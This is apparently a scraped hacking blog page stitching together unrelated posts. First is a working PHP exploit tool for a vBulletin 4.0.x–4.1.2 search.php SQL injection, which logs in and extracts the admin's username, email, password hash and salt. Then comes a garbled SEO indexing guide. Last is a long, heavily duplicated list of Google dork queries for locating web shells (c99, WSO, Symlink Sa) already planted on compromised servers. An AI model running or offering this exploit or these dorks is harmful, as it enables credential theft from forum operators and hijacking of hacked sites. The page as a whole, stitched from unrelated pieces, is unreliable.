vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability

<?
/*
vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability

                      888               888    888              
                      888               888    888              
                      888               888    888              
 .d8888b .d88b.   .d88888  .d88b.   .d88888    88888b.  888  888
d88P"   d88""88b d88" 888 d8P  Y8b d88" 888    888 "88b 888  888
888     888  888 888  888 88888888 888  888    888  888 888  888
Y88b.   Y88..88P Y88b 888 Y8b.     Y88b 888    888 d88P Y88b 888
 "Y8888P "Y88P"   "Y88888  "Y8888   "Y88888    88888P"   "Y88888
                                                             888
                                                        Y8b d88P
                                                         "Y88P"

8888888b.         d8888 888888b.    .d8888b.   .d88888b.  888     888 888b    888
888   Y88b       d88888 888  "88b  d88P  Y88b d88P" "Y88b 888     888 8888b   888
888    888      d88P888 888  .88P       .d88P 888     888 888     888 88888b  888
888   d88P     d88P 888 8888888K.      8888"  888     888 888     888 888Y88b 888
8888888P"     d88P  888 888  "Y88b      "Y8b. 888     888 888     888 888 Y88b888
888 T88b     d88P   888 888    888 888    888 888     888 888     888 888  Y88888
888  T88b   d8888888888 888   d88P Y88b  d88P Y88b. .d88P Y88b. .d88P 888   Y8888
888   T88b d88P     888 8888888P"   "Y8888P"   "Y88888P"   "Y88888P"  888    Y888


mail : v.b-4@hotmail.com
*/
?>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1256" />
<center>
<h1>vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability</h1>

<form method='post' action=''>
<table border='1'>
<tr><td>Forum Url</td><td> <input type='text' size='100' name='url' value=''></td></tr>
<tr><td>User name</td><td> <input type='text' size='100' name='username' value=''></td></tr>
<tr><td>Password </td><td><input type='text' size='100' name='password' value='' ></td></tr>
<tr><td>Admin ID </td><td><input type='text' size='100' name='admin_id' value=''></td></tr>
<tr><td>Valid Group Search Word</td><td><input type='text'  size='100' name='query'value='romnce'></td></tr>
</table>
<input type="hidden" name="form_action" value="1">
<input type='submit' value='Get'>
</form>
</center>

<?
 if($_POST['form_action'] == 1 )
 {
$query=$_POST["query"];
$url=$_POST["url"];
$admin_id=$_POST["admin_id"];

$sql="&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=".$admin_id."#";
$user=$_POST["username"];
$pass=$_POST["password"];
       $md5Pass = md5($pass);
       $data = "do=login&url=%2Findex.php&vb_login_md5password=$md5Pass&vb_login_username=$user&cookieuser=1";

       $ch = curl_init();

    curl_setopt ($ch, CURLOPT_URL, $url."/login.php?do=login"); // replace ** with tt
    curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
    curl_setopt ($ch, CURLOPT_TIMEOUT, '10');
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch,CURLOPT_POSTFIELDS,$data);
    curl_setopt($ch, CURLOPT_COOKIEJAR, "vb.txt");
    curl_setopt($ch, CURLOPT_COOKIEFILE, "vb.txt");
   // curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
//curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:8118");
    curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
    $store = curl_exec ($ch);

        curl_close($ch);
       $ch = curl_init();

    curl_setopt ($ch, CURLOPT_URL, $url."/search.php"); // replace ** with tt
    curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
 
 
 
    curl_setopt($ch, CURLOPT_COOKIEJAR, "vb.txt");
    curl_setopt($ch, CURLOPT_COOKIEFILE, "vb.txt");
    //curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
//curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:8118");
    curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
    $store = curl_exec ($ch);

        curl_close($ch);
$sec=myf($store,'var SECURITYTOKEN = "','";');


       $ch = curl_init();

    curl_setopt ($ch, CURLOPT_URL, $url."/search.php");
    curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
    curl_setopt ($ch, CURLOPT_TIMEOUT, '10');
    curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch,CURLOPT_POSTFIELDS,"type%5B%5D=7&query=".$query."&titleonly=1&searchuser=&exactname=1&tag=&dosearch=Search+Now&searchdate=0&beforeafter=after&sortby=relevance&order=descending&saveprefs=1&s=&securitytoken=".$sec."&do=process&searchthreadid=".$sql);
    curl_setopt($ch, CURLOPT_COOKIEJAR, "vb.txt");
    curl_setopt($ch, CURLOPT_COOKIEFILE, "vb.txt");
   
//curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:8118");
    curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
    $store = curl_exec ($ch);

        curl_close($ch);



$url2= trim(myf($store,"Location:","Content-Length:"));

       $ch = curl_init();
    curl_setopt ($ch, CURLOPT_URL,$url2);
    curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
   curl_setopt($ch, CURLOPT_COOKIEJAR, "vb.txt");
    curl_setopt($ch, CURLOPT_COOKIEFILE, "vb.txt");
    //curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
//curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:8118");
    curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
    $store = curl_exec ($ch);

        curl_close($ch);
echo("<table border='1'>");
$list=explode(":", myf($store,'<p class="description">','</p>'));
echo("<tr><td>User Name</td><td><input size='100' type='text' value='".str_replace("Uncategorized,","",$list['3'])."'></td></tr>");
echo("<tr><td>Mail</td><td><input size='100' type='text' value='".$list['4']."'></td></tr>");
echo("<tr><td>MD5</td><td><input size='100' type='text' value='".$list['5']."'></td></tr>");
echo("<tr><td>Salt</td><td><input size='100' type='text' value='".$list['6']."'></td></tr>");

//print_r($list);
}
function myf($text,$marqueurDebutLien,$marqueurFinLien)

{

$ar0=explode($marqueurDebutLien, $text);
$ar1=explode($marqueurFinLien, $ar0[1]);
$ar=$ar1[0];
return trim($ar);
}
?>

torrent-tracker listesi

Bu özet kullanılabilir değil. Yayını görüntülemek için lütfen burayı tıklayın.

Debian sunucu güvenliğini

site indexleme

1. Create a link on that page is indexing search engines to the direction of our new website. We emulate the profile (for example: “www.friendster.com / okam” is a good example to link to the blog or our website. Because this page usually has terindeks search engine. The higher the position of the pages in search engines (PageRank) means the more quickly we terindeks new webiste. 
You can contact your friend is terindeks the blog search engines to install a link to you.
* If the profile / emulate in your blog / Multiply terindeks already, you can install a link in your profile is.
* Every fill your blog. Google Analytic is a plug-in idea will always monitor your activities.
2. Submit manually through the following URL (FREE):
* Google: http://www.google.com/addurl.html
* Yahoo: http://search.yahoo.com/info/submit.html
* AltaVista: http://www.altavista.com/addurl/
* DMOZ / ODP: http://www.dmoz.org/add.html
* Alexa: http://www.alexa.com/support/get_archive.html
* MSN: http://search.msn.com/docs/submit.aspx
3. Submit the URL pay:
* Lycos: http://home.lycos.com/addasite.html
4. Before downloading you submit the URL of your website, make sure that:
* Website or blog so you have (not under construction).
* There are no dead links in your website.
* Website or made to your search engine friendly.

After you submit your URL, wait with patience. If the website you will be lucky terindeks in less than 24 hours, if not prosper you must wait 3 months, possibly even your application is not accepted Search Engine. You can re-submit if within 3 months of your website not appear in search engines.

What should be done during the wait? Building the link. Can be suddenly your website because nongol not submit manually, but because of a link from another website.

Congratulations to try.

Shell Arama Kodları

intitle:webr00t cgi shell
“inurl:.root”.”webr00t cgi shell”
“intitle:Index of */sym”.”inurl:/sym”
“5.2.17 Safe mode:”
“5.2.11 Safe mode:”
“5.2.12 Safe mode:”
“Sifre=webr00t”
“5.2.11 Safe mode:”
“5.2.10 Safe mode:”
“5.2.1 Safe mode:”
intxt:”webadmin.php”
inurl:webadmin.php”
intitle: Linux * 2.6.18-348.1.1.el5PAE
intitle: – WSO 2.3
intitle: – WSO 2.4
intitle: – WSO 2.5
intitle: – WSO 2.5.1
5.2.16 Safe mode: OFF [ phpinfo ] Datetime:
2009 i686 Server IP:
2010 i686 Server IP:
2011 i686 Server IP:
2012 i686 Server IP:
2013 i686 Server IP:
“Userful: gcc, cc, ld, make, php, perl, python, tar, gzip, bzip2, nc, locate”
“Downloaders: wget, lynx, links, curl, lwp-mirror”
“Type Host Login Password Database”
“Execution PHP-code”
“reverse (login -> nigol)”.”/etc/passwd”
” Bind port to /bin/sh [perl]“
“drwxr-xr-x [ home ]“
inurl:wso2.php
inurl:wso2.4.php
inurl:wso2.5.php
inurl:wso2.5.1.php
“Filesystem Size Used Avail Use% Mounted on”
“# Do not remove the following line, or various programs”
inurl:wso.php uid=0(root)
“posix_getpwuid (“Read” /etc/passwd)”
“captain crunch security team” inurl:wso
download wso2.php
download wso2.5.1.php
inurl:sym.php
allinurl: wsotest.php
inurl:wso.php
“-:[ User & Domains & Symlink ]:-“
allinurl: wso.php
inurl:”/wso.php”
allinurl: wso2.5.php
inurl:wso.php
inurl:”sym.php” Symlink Sa 3.0
inurl:wso.php uid=0(root)
“Symlink Sa 3.0″
intitle:Symlink Sa 3.0
inurl:”/wso.php”
inurl:wso.php
inurl:wso2.php
inurl:wso2.5.php
inurl:wso2.5.1.php
wso shell v.1.0 (roots)
inurl:wso.php
allintitle: “[ Home ] [ User & Domains & Symlink ] [ Domains & Script ] [ Symlink File ] [ Symlink Bypass ] “
inurl:”[ Home ] [ User & Domains & Symlink ] [ Domains & Script ] [ Symlink File ] [ Symlink Bypass ] “
intxt:[ Bypass Read ] [ Mass Joomla ] [ Mass WordPress ] [ Mass vBulletin ] [ Help ]
intitle:B-F Config_cPanel
intitle:Blind SQL Injection
intitle:Bypass Disable function
intitle:Carbylamine PHP Encoder
intitle:Change Joomla Index
intitle:Change WP Index
intitle:Converter Havij To Pro
intitle:Cpanel Brute Forcer 2012
intitle:Cpanel Brute Forcer 2011
intitle:Cpanel Brute Forcer 2013
intitle:Cpanel Webmail Brute Forcer
intitle:Face Book Brute Forcer
intitle:zip Filez Server ScaNNer v1.0
“Saudi Sh3ll v1.0″
inurl:wso.php#
Allinurl:wso2.5.1.php#
Allinurl:wso2.5.php#
Allinurl:wso2.4.php#
intitle:wsec_wp GUI v1.0
intitle:Symlink Sa v3.0
intitle:Symlink Sa v2.0
intitle:Symlink Sa v1.0
intitle:king B_F v1.0 Brute Forcer script
intitle:r00t4Lif t00lkit v0.2
allinurl: “wso.php”
intitle:symlink_Sa 2.0
inurl:.php?sws=sec
inurl:.php?sws=sym
inurl:.php?sws=file
inurl:.php?act=selfremove
inurl:.php?act=sql
safe-mode: off (not secure) drwxrwxrwx c99shell
inurl:c99.php
inurl:c99.php uid=0(root)
root c99.php
"Captain Crunch Security Team" inurl:c99
inurl:c99.php
allinurl: c99.php
inurl:c99.php
inurl:"c99.php" c99shell
inurl:c99.php uid=0(root)
c99shell powered by admin
c99shell powered by admin
inurl:"/c99.php"
inurl:c99.php
c99 shell v.1.0 (roots)
inurl:c99.php
allintitle: "c99shell"
inurl:"c99.php
allinurl: "c99.php"
inurl:c99.php
intitle:C99Shell v. 1.0 pre-release +uname
allinurl: "c99.php"
inurl:c99.php
inurl:"c99.php" c99shell
inurl:"/c99.php
inurl:/c99.php+uname
allinurl:"c99.php"
inurl:"c99.php"
allinurl:c99.php
"inurl:c99..php"
c99shell [file on secure ok ]?
powered by Captain Crunch Security Team
allinurl:c99.php
"c99.php" filetype:php
allinurl:c99.php
inurl:c99.php
allinurl:.c99.php
"inurl:c99.php"
c99. PHP-code Feedback Self remove
allinurl:c99.php
download c99.php
allinurl:c99.php
inurl:c99.php
allinurl: "c99.php"
intitle:C99Shell v. 1.0 pre-release +uname
allinurl:"c99.php"
inurl:c99.php
safe-mode: off (not secure) drwxrwxrwx c99shell
c99.php download
inurl:c99.php
c99shell filetype:php -echo
inurl:"c99.php"
inurl:c99.php uid=0(root)
allinurl:c99.php
inurl:"/c99.php" intitle:"C99shell"
C99Shell v. 1.0 pre-release build #5
--[ c99shell v. 1.0 pre-release build #16
c99shell linux infong
C99Shell v. 1.0 pre-release build
!C99Shell v. 1.0 beta!
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
!c99shell v. 1+Safe-mode: OFF (not secure)
"C99Shell v. 1.0 pre-release build "
intitle:c99shell +filetype:php
inurl:c99.php
intitle:C99Shell v. 1.0 pre-release +uname
intitle:!C99Shell v. 1.0 pre-release build #16! root
!C99Shell v. 1.0 pre-release build #5!
inurl:"c99.php"
C99Shell v. 1.0 pre-release build #16!
intitle:c99shell intext:uname
allintext:C99Shell v. 1.0 pre-release build #12
c99shell v. 1.0 pre-release build #16
--[ c99shell v. 1.0 pre-release build #15 | Powered by ]--
allinurl: "c99.php"
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
"c99shell v 1.0"
ftp apache inurl:c99.php
c99shell+v.+1.0 16
C99Shell v. 1.0 pre-release build #16 download
intitle:c99shell "Software: Apache"
allinurl: c99.php
allintext: Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove
intitle:c99shell uname -bbpress
intitle:"index.of" c99.php
inurl:admin/files/
intitle:"index of /" "c99.php"
intitle:"index of" intext:c99.php
intitle:index.of c99.php
intitle:"index of" + c99.php
intitle:index/of file c99.php
intitle:index/of file c99.php
index of /admin/files/
intitle:"Index of/"+c99.php
c99.php "intitle:Index of "
intitle:index.of c99.php
img/c99.php
intitle:index.of c99.php
img.c99.php
intitle:"Index of/"+c99.php
"index of /" c99.php
c99.php
intitle:"Index of" c99.php
"index of" c99.php
"Index of/"+c99.php
safe-mode: off (not secure) drwxrwxrwx c99shell
inurl:c99.txt
inurl:c99.php uid=0(root)
root c99.php
“Captain Crunch Security Team” inurl:c99
download c99.php
inurl:c99.php
allinurl: c99.php
allinurl: c99.txt
inurl:”/c99.php”
inurl:”c99.php” c99shell
inurl:c99.php uid=0(root)
c99shell powered by admin
inurl:”/c99.php”
c99 shell v.1.0 (roots)
allintitle: “c99shell”
inurl:”c99.php
allinurl: “c99.php”
intitle:C99Shell v. 1.0 pre-release +uname
intitle:C99Shell v. 1.0 pre-release +uname
allinurl: “c99.php”
inurl:”c99.php”
inurl:”c99.php”
inurl:”c99.php” c99shell
inurl:”c99.php”
inurl:”/c99.php
inurl:c99.php?
inurl:/c99.php+uname
allinurl:”c99.php”
inurl:”c99.php”
allinurl:c99.php?
“inurl:c99..php”
allinurl:c99.php
c99shell [file on secure ok ]?
inurl:c99.php
powered by Captain Crunch Security Team
allinurl:c99.php
“c99.php” filetypehp
allinurl:c99.php
inurl:c99shell.php
allinurl:.c99.php
“inurl:c99.php”
c99. PHP-code Feedback Self remove
allinurl:c99.php
download c99.txt
inurl:c99shell.txt
allinurl: “c99.php”
allinurl:c99.php
allinurl:c99.php
c99shell
inurl:c99.php
intitle:C99Shell v. 1.0 pre-release +uname
allinurl:”c99.php”
inurl:c99.php
safe-mode: off (not secure) drwxrwxrwx c99shell
inurl:/c99.php
inurl:”c99.php”
inurl:c99.php
c99.php download
inurl:”c99.php”
inurl:/c99.php
inurl:”c99.php?”
files/c99.php
c99shell filetypehp -echo
c99shell powered by admin
inurl:”c99.php”
inurl:c99.php uid=0(root)
inurl:”c99.php”
inurl:”/c99.php” intitle:”C99shell”
C99Shell v. 1.0 pre-release build #5
inurl:c99.php
–[ c99shell v. 1.0 pre-release build #16
c99shell linux infong
C99Shell v. 1.0 pre-release build
!C99Shell v. 1.0 beta!
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
!c99shell v. 1+Safe-mode: OFF (not secure)
"C99Shell v. 1.0 pre-release build "
intitle:c99shell +filetypehp
intitle:C99Shell v. 1.0 pre-release +uname
"Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
intitle:!C99Shell v. 1.0 pre-release build #16! root
!C99Shell v. 1.0 pre-release build #5!
C99Shell v. 1.0 pre-release build #16!
intitle:c99shell intext:uname
allintext:C99Shell v. 1.0 pre-release build #12
c99shell v. 1.0 pre-release build #16
--[ c99shell v. 1.0 pre-release build #15 | Powered by ]–
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
“c99shell v 1.0?
ftp apache inurl:c99.php
c99shell+v.+1.0 16
C99Shell v. 1.0 pre-release build #16 download
intitle:c99shell “Software: Apache”
allinurl: c99.php
allintext: Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove
Logout
powered by Captain Crunch Security Team
!C99Shell v. 1.0 pre-release build #5!
c99shell v. 1.0 release security
c99shell v. 1.0 pre-release build
c99shell [file on secure ok ]?
C99Shell v. 1.3
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
inurl:c99.php uid=0(root)
powered by Captain Crunch Security Team
C99Shell v. 1.0 pre-release build #16
c99shell[on file]ok
c99shell[file on ]ok
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
“C99Shell v. 1.0 pre”
=C99Shell v. 1.0 pre-release
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
c99shell v. pre-release build
inurl:c99.php c99 shell
inurl:c99.php c99 shell
powered by Captain Crunch Security Team
!C99Shell v. 1.0 pre-release build #5!
intitle:”c99shell” filetypehp root
intitle:”c99shell” Linux infong 2.4
C99Shell v. 1.0 beta !
C99Shell v. 1.0 pre-release build #
allintext:C99Shell v. 1.0 pre-release build #12
“C99Shell v. 1.0 pre”
powered by Captain Crunch Security Team
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
inurl:/c99.php?
intitle:C99Shell pre-release
powered by Captain Crunch Security Team
C99Shell v. 1.0 pre-release build #16!
C99Shell v. 1.0 pre-release build #16 administrator
intitle:c99shell filetypehp
powered by Captain Crunch Security Team
powered by Captain Crunch Security Team
C99Shell v. 1.0 pre-release build #12
c99shell v.1.0
“c99shell v. 1.0 pre-release build”
inurl:”c99.php” filetypehp
“c99shell v. 1.0 “
ok c99.php
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
c99shell v. 1.0 pre-release build #16 |
!C99Shell v. 1.0 pre-release build #5!
!C99Shell v. 1.0 pre-release build #5!
powered by Captain Crunch Security Team
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
powered by Captain Crunch Security Team
C99Shell v. 1.0 pre-release
inurl:c99.php exthp
allinurl:”c99.php”
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
powered by Captain Crunch Security Team
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout”
C99Shell v. 1.0 pre-release build #16 software apache
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
“c99shell v 1.0?
allintitle: C99shell filetypehp
C99Shell v. 1.0 pre-release build #16!
“c99shell v. 1.0 pre-release”
c99shell v. 1.0 pre-release build #5
allinurl:”c99.php” filetypehp
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
!C99Shell v. 1.0 pre-release build #16!
intitle:C99Shell v. 1.0 pre-release +uname
c99shell v. 1.0
–[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | ]–
inurl:”/c99.php”
c99shell +uname
c99shell php + uname
c99shell php + uname
–[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | ]–
!C99Shell v. 1.0 pre-release build #5!
C99Shell v.1.0 pre-release
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
intitle:c99shell filetypehp
“Encoder Tools Proc. FTP brute”
“c99? filetypehp intext:”Safe-Mode: OFF”
c99shell v. 1.0 pre
intitle:c99shell uname -bbpress
intitle:”index.of” c99.php
inurl:admin/files/
intitle:”index of /” “c99.php”
intitle:”index of” intext:c99.php
intitle:index.of c99.php
intitle:”index of” + c99.php
intitle:index/of file c99.php
intitle:index/of file c99.php
index of /admin/files/
intitle:”Index of/”+c99.php
c99.php “intitle:Index of “
c99.php “intitle:Index of “
c99.php “intitle:Index of “
intitle:index.of c99.php
img/c99.php
intitle:index.of c99.php
img.c99.php
intitle:”Index of/”+c99.php
“index of /” c99.php
intitle:”Index of” c99.php
“index of” c99.php
“Index of/”+c99.php